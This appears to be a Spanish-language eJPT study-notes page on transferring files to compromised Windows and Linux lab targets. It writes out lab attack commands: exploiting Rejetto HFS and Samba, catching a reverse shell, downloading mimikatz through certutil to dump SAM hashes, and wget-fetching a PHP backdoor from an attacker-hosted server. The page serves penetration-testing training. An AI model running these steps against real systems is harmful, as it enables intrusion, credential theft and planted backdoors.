eJPT
  • 👋Welcome
  • Tools
    • 🔭Escaneo y Enumeración
  • SECTION 1: Assessment Methodologies
    • Assessment Methodologies: Information Gathering
      • Introducción a la Recopilación de Información
        • Start Quiz
      • Passive Information Gathering
      • Active Information Gathering
    • Assessment Methodologies: Footprinting & Scanning
      • Introduction
      • Networking Primer
      • Host Discovery
      • Port Scanning
      • Evasion, Scan Performance & Output
      • Page
      • Challenges
    • Assessment Methodologies: Enumeration
      • Overview
      • SMB Lesson
      • FTP Lesson
      • SSH Lesson
      • HTTP Lesson
      • SQL Lesson
    • Assessment Methodologies: Vulnerability Assessment
      • Vulnerability Assessment
      • Course Labs
  • SECTION 2: Host & Networking Auditing
    • Assessment Methodologies: Auditing Fundamentals
      • Assessment Methodologies
      • Practice
  • SECTION 3: Host & Network Penetration Testing
    • Host & Network Penetration Testing: System/Host Based Attacks
      • Introduction to Attacks
      • Windows Vulnerabilities
      • Exploiting Windows Vulnerabilities
      • Windows Privilege Escalation
      • Windows File System Vulnerabilities
      • Windows Credential Dumping
      • Linux Vulnerabilities
      • Exploiting Linux Vulnerabilities
      • Linux Privilege Escalation
      • Linux Credential Dumping
      • Conclusion
    • Host & Network Penetration Testing: Network-Based Attacks
      • Network-Based Attacks
    • Host & Network Penetration Testing: The Metasploit Framework (MSF)
      • Metasploit
        • Metasploit Fundamentals
      • Information Gathering & Enumeration
        • Nmap
        • Enumeration
      • Vulnerability Scanning
        • MSF
        • Nessus
        • Web Apps
      • Client-Side Attacks
        • Payloads
        • Automating
      • Exploitation
        • Windows Exploitation
        • Linux Exploitation
        • Post Exploitation Fundamentals
        • Windows Post Exploitation
        • Linux Post Exploitation
      • Armitage
        • Metasploit GUIs
    • Host & Network Penetration Testing: Exploitation
      • Introduction To Exploitation
      • Vulnerability Scanning Overview
      • Exploits
        • Searching For Exploits
        • Fixing Exploits
      • Shells
      • Frameworks
      • Windows
      • Linux
      • Obfuscation
    • Host & Network Penetration Testing: Post-Exploitation
      • Introduction
      • Windows Enumeration
      • Linux Enumeration
      • Transferring Files
      • Shells
      • Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
      • Persistence
        • Windows Persistence
        • Linux Persistence
      • Dumping & Cracking
        • Windows Password Hashes
        • Linux Password Hashes
      • Pivoting Lesson
      • Clearing
  • Host & Network Penetration Testing: Social Engineering
    • Social Engineering
  • SECTION 4: Web Application Penetration Testing
    • Introduction to the Web & HTTP Protocol
      • Web Applications
      • HTTP Protocol
        • HTTP/S Protocol Fundamentals
        • Website Crawling & Spidering
Powered by GitBook
On this page
  • Setting Up A Web Server With Python
  • Transferring Files To Target Systems
  • Setting Up A Web Server With Python
  • Demo: Setting Up A Web Server With Python
  • Quiz: Setting Up A Web Server With Python
  • Transferring Files To Windows Targets
  • Demo: Transferring Files To Windows Targets
  • Quiz: Transferring Files To Windows Targets
  • Transferring Files To Linux Targets
  • Demo: Transferring Files To Linux Targets
  • Quiz: Transferring Files To Linux Targets
  1. SECTION 3: Host & Network Penetration Testing
  2. Host & Network Penetration Testing: Post-Exploitation

Transferring Files

Transferring Files To Windows & Linux Targets

Setting Up A Web Server With Python

Transferring Files To Target Systems

Después de obtener acceso inicial a un sistema de destino, deberá transferir archivos a dicho sistema.

En algunos casos, no tendrá acceso al sistema de destino a través de una sesión de Meterpreter y, como resultado, deberá utilizar las utilidades específicas del sistema operativo incorporadas para facilitar la transferencia de archivos desde su sistema al sistema de destino.

Este proceso utiliza un enfoque de dos pasos, en el que deberá alojar los archivos que desea transferir en un servidor web y descargar los archivos alojados en el servidor web al sistema de destino.

Setting Up A Web Server With Python

Python viene con un módulo integrado conocido como SimpleHTTPServer(python2) y http.server (python3), que se puede utilizar para facilitar un servidor HTTP simple que le proporcione controladores de solicitudes GET y HEAD estándar.

Este módulo se puede utilizar para alojar archivos en cualquier directorio de su sistema y se puede implementar a través de un solo comando en su terminal.

Demo: Setting Up A Web Server With Python

cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
ls

# Creado un servidor http con python 2
python -m SimpleHTTPServer 80

# Creado un servidor http con python 3
python3 -m http.server 80

Quiz: Setting Up A Web Server With Python

Transferring Files To Windows Targets

Demo: Transferring Files To Windows Targets

nmap -sV -p 80 10.2.30.185
searchsploit rejetto

searchsploit -m 39161
vim 39161.py
# Configurar el archivo deacuerdo al ambiente
# configurar IP / puerto


# Atacante
cd /usr/share/windows-binaries
python3 -m http.server 801

python 39161.py 10.2.30.185 801

nc -nvlp 1234
whoami
whoami /priv

# Trasnferimos el mimikatz
cd <Path Mimikatz .exe>
python3 -m http.server 80
# Descarcargar con windows
certutil -urlcache -f http://10.10.5.2/mimikatz.exe  mimikatz.exe

# Vovlado de hash
.\mimikatz.exe
privilege::debug
lsadump::sam

Quiz: Transferring Files To Windows Targets

Transferring Files To Linux Targets

Demo: Transferring Files To Linux Targets

# Obtener acceso al objetivo
nmap -sV 192.196.45.3

# tmux, es una herrramienta que te permite abrir multiples terminales
# Control B o C, abrira una nueva terminal


msf5 > setg RHOSTS 192.196.45.3
msf5 > search samba
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
msf5 exploit(linux/samba/is_known_pipename) > exploit

/bin/bash -i
root@victim-l:/tmp# cat /etc/*release

# Configuramos python para transferir
cd /usr/share/webshells/php
pyhon3 -m http.server 80

# Descargar desde una URL en Linux
wget http://192.196.45.2/php-backdoor.php

Quiz: Transferring Files To Linux Targets

PreviousLinux EnumerationNextShells

Last updated 8 months ago